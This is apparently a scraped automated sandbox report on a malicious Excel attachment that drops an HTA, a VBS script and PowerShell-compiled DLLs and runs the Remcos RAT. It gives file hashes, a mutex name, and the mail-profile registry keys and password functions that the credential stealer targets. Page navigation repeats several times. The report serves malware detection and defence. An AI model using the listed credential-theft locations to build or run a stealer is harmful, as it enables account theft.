Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: ESMTPPassword	41_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	41_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	41_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match

File source: Process Memory Space: CasPol.exe PID: 3900, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RXIGCE

Windows Analysis Report
A & C Metrology OC 545714677889Materiale.xls

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1545826
Product:	CloudBasic
Start time:	05:12:41
Start date:	31.10.2024
Sample:	A & C Metrology OC 545714677889Materiale.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	3d240803d6a9ad22dcc9d51d15c89279
SHA1:	5f93ce2e9216c89d155ec35b60dc2aae2f618bbd
SHA256:	d4d28af1f5d5e72ff66ae165e2d232764bc88f7dfdd380cce3b5c7a593fd9e40
Filetype:	Microsoft Excel sheet (30009/1) 78.94%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	278C40A9A3B321CA9147FFBC6BE3A8A8	D795FC7D3249F9D924DC951DA1DB900D02496D73	4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta	HTML document, ASCII text, with very long lines (65536), with no line terminators	9F7246F010B3A5F0AF7916AE221C0542	25AA19553540725FCE3C73170A47F6941BBE1BDD	6D89514EBEA3915078EA273BCE9BB236F72CF36095E6688DF0B9A3A645F22AB1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\picturewithgreatnewswithgoodthingsonbestplace[1].tiff	Unicode text, UTF-16, little-endian text, with CRLF line terminators	56B6F31B8CD3BA627DEEBA14CCA18DE8	16CEA6537A5E76140939C4514E90DAB9E85787FE	0F0E3EADB94941689F2A80003A1401274075759ECB2837129EAE3CF37BF724FB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json	JSON data	0CB0F94F254896E3B02821BF79268CEC	DC0EB40C0C93E97DE3B5D1B83FA372858301BC41	68430F15070A53EE3EE96EC44ED92D620B9AF3DE211624C96F94FFEF5DCA3916
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\180B9CB3.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	DF35BBD78C48F711FC1CF95F65C51E03	A12873DC03B00CCAD023EF993139DF2B6AB15C4D	692617F0F2226E11FB5DAD2102E0C506FFF63DDDA0646CB7F63965548276493B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\368CC4FA.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	75F7043A255C6B9CF5293E4298ED5B1C	CB4BF68466ECDACE7C1FEDC8D01169A80381C49D	9959002E0E67D70E08CB7A9226D1824D77FFD8CA4AB9904233B717E8EB3FEF27
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D9573FB.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	2EFA3D5F23ED43B57DFD93FC588D2612	21B7A75CE29B29F6FE5968F08DCED7AC32F35F1D	78299B94D14E37DD3B7E2B0457C3EA35B08FFD269C7E03886007D390650F8D23
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AA02F62.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	75F7043A255C6B9CF5293E4298ED5B1C	CB4BF68466ECDACE7C1FEDC8D01169A80381C49D	9959002E0E67D70E08CB7A9226D1824D77FFD8CA4AB9904233B717E8EB3FEF27
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE5C0.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	D85DAC1376E45C58F790BD50C2729F6C	5BD339C54A944689935652E4A1CC78961EB19589	CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
C:\Users\user\AppData\Local\Temp\1py0mh1i.eyz.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\1vaxlmbz.scv.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\24gpjrna.isx.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\2zk1p2gc.epx.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\4txanzkw.1kp.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\5h3o10cv.cdk.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\RES7A10.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 31 04:14:03 2024, 1st section name ".debug$S"	57D88633AF5D0D2EF3CD4633B58D81C2	BDA5D239EB690CB365C77697D4432625F8CC2777	241378B2995EC9718A254D5FC3D93D97587AFD37B2AB76622C086A4F3E107681
C:\Users\user\AppData\Local\Temp\RESC85F.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 31 04:14:23 2024, 1st section name ".debug$S"	29052E177B97F14E4EE6A5420EBB8AA7	FEB5AC080C1F76A98B0A0DA932BB1F31850B76B6	E623E007B4B8F17A4436DECAE845A1C157AA3CB53750409CA3CA2F56FFCBCBD5
C:\Users\user\AppData\Local\Temp\aboyzkdo.yf1.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\bhv2DF4.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x03840a1c, page size 32768, DirtyShutdown, Windows version 6.1	5EC075DF695FC53A8DB65B79226CFDEE	1F3542A2D0180FBAA4B9E6CAC0EF16BF796431B2	30395F7A4A21180950C8B90C6882ECA06B9560B55AE86E89B007CBD53AC02D08
C:\Users\user\AppData\Local\Temp\bhv417.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x03840a1c, page size 32768, DirtyShutdown, Windows version 6.1	5EC075DF695FC53A8DB65B79226CFDEE	1F3542A2D0180FBAA4B9E6CAC0EF16BF796431B2	30395F7A4A21180950C8B90C6882ECA06B9560B55AE86E89B007CBD53AC02D08
C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Local\Temp\fds3zcto.zzs.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\l3vldqo2.q3p.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\legehkn5.guh.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\ooofmq3d.gjy.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP	MSVC .res	907FCAD9F4A2FADA8C4881111EE3CDF7	404D28B4A5E36DD1614705EE117B95C87D80F294	0EE37D435A333E04C3888941951A71C936464E0ACFD18E52657180650BEE5553
C:\Users\user\AppData\Local\Temp\revod450\revod450.0.cs	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)	727AC40544404E45480F402CFA6F0FAC	D2C20E9E01B6C518C264D7ACDF3B11EFCAD11E72	33E16396400813988F0768EA7C3C1C216D5E3F037D6344890E5E2F0123287540
C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators	C23D11AC804A21E68966445D23AC5367	E39F28A5E260F215D83D1D073D6D2782F1EC6643	3DF6628DAE90ADE6416942E6A7F3AD0B14D8D39177F7B707855E1498AEE788CE
C:\Users\user\AppData\Local\Temp\revod450\revod450.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	E98C30826828825AE866FB5EDBAF4FC5	BB2DEE076804636B5D9567B926E1DFE00B2E5868	A517C992606804D80DD0678DBF83F86BAA4D92699C0203A3E9D43179A6A276CE
C:\Users\user\AppData\Local\Temp\revod450\revod450.out	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators	AEEF61205606141344D2BAA2102744AA	C60D7F70394C4F8B0DE12564FB509E3AEB2C329F	8F43B161EBDF385E6470EA19F1CE87E2E5B23C30C9CD30A661E63DB887D236C0
C:\Users\user\AppData\Local\Temp\ro2x0ujm.yqd.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\tcqnvyec.bvj.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\u3qqruit.gii.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\v4pa1vwr.u0p.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\wjfjxygv.fk5.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP	MSVC .res	56058642723A4A70EDFC4D22B7C78125	315DC8241A7174A5F146C47E54727EAD7F627D7B	3CA6D3456D93C12466E712FFC6A54022663F12154F4E40706F9A3C1D876DD4BB
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.0.cs	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)	727AC40544404E45480F402CFA6F0FAC	D2C20E9E01B6C518C264D7ACDF3B11EFCAD11E72	33E16396400813988F0768EA7C3C1C216D5E3F037D6344890E5E2F0123287540
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators	19F4A4A53FBF0DB5D7DD5007AEBE386C	D247988680BDBF5642BB8483482E01B0D9FA50CB	0831F058CDDCA5A136BBF6251C6F07131431D056C37896859EC86A766E261982
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	E7639EC15BC05CF3A479C582420EC522	F4F71CBFDD7E95004ACDD22235B902BEB49FE6A4	5E83950716B7C85D4B2FC015670014F475C1229B70F3626C53285477C9DE1109
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.out	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators	AC75E81F19034D74C252C0D229BBC37A	D6FFC1B45FAAF2BFFDCA1DC795D9EE55C4EBE973	E843FDB4E63A2B6BB50CECBB21AD8DD4B47CEF92D468D6077149D2519BF60595
C:\Users\user\AppData\Local\Temp\~DF461EF3F8D7EFD076.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF523C1B826206368A.TMP	data	90FE15F4BFD75D550611E8E05AA48E8F	CCA96DAF3F086AC30A0E016ED5FD1F32A89287CE	5B59DF6AEC3E91ADB5D9F4A1A6C0509906C210B606B526E54A6FF568AFADC642
C:\Users\user\AppData\Local\Temp\~DF5E72911EE0F8EE5F.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFE74F55484018A372.TMP	Composite Document File V2 Document, Cannot read section info	072C436994F2A5243BEC038835BE6C59	3447AB82E4C989931E38526FD101F27BEECF33F1	7593D1CC84326211526BD862359ACA7B9FE01187C3D56A759DDD4CE31E2C9287
C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs	Unicode text, UTF-16, little-endian text, with CRLF line terminators	56B6F31B8CD3BA627DEEBA14CCA18DE8	16CEA6537A5E76140939C4514E90DAB9E85787FE	0F0E3EADB94941689F2A80003A1401274075759ECB2837129EAE3CF37BF724FB
C:\Users\user\Desktop\7B130000	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 31 04:14:13 2024, Security: 1	D2A07E6DE3E031DFA4EA1644FF513BE1	9AE5B19CFD97C5F357B92CAC98FFD4CE45C40426	518AF69B1FC69F8B6F295AB32F0844F4B65FA3439AD50248D6E6EBA77D97FD19
C:\Users\user\Desktop\7B130000:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Desktop\A & C Metrology OC 545714677889Materiale.xls (copy)	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 31 04:14:13 2024, Security: 1	D2A07E6DE3E031DFA4EA1644FF513BE1	9AE5B19CFD97C5F357B92CAC98FFD4CE45C40426	518AF69B1FC69F8B6F295AB32F0844F4B65FA3439AD50248D6E6EBA77D97FD19

Windows Analysis Report A & C Metrology OC 545714677889Materiale.xls

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
A & C Metrology OC 545714677889Materiale.xls

Malware Threat Intel
Provided by